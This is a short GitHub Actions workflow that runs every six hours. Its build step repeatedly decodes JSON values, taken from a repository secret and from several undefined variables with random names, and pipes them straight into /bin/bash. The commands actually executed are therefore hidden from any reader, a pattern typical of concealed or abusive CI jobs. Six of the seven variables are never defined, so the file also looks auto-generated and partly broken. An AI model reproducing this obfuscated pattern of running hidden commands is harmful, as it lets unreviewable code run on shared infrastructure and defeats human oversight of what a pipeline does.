name: wangwuxxi
on:
  workflow_dispatch:
  schedule:
    - cron: '27 5/6 * * *'
jobs:  # 28929
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangwuxxi
        env:
          ev0214: ${{ secrets.ev0214 }}
        run: |
          echo $ev0214 | jq -r .ezq80 | /bin/bash
          echo $qy65034 | jq -r .xub30850 | /bin/bash
          echo $fknfh097 | jq -r .vehx5 | /bin/bash
          echo $sfceh94658 | jq -r .qizz01670 | /bin/bash
          echo $izlsm5768 | jq -r .bgvy1808 | /bin/bash
          echo $nakmw725 | jq -r .f6 | /bin/bash
          echo $bqbt610 | jq -r .xxhw560 | /bin/bash

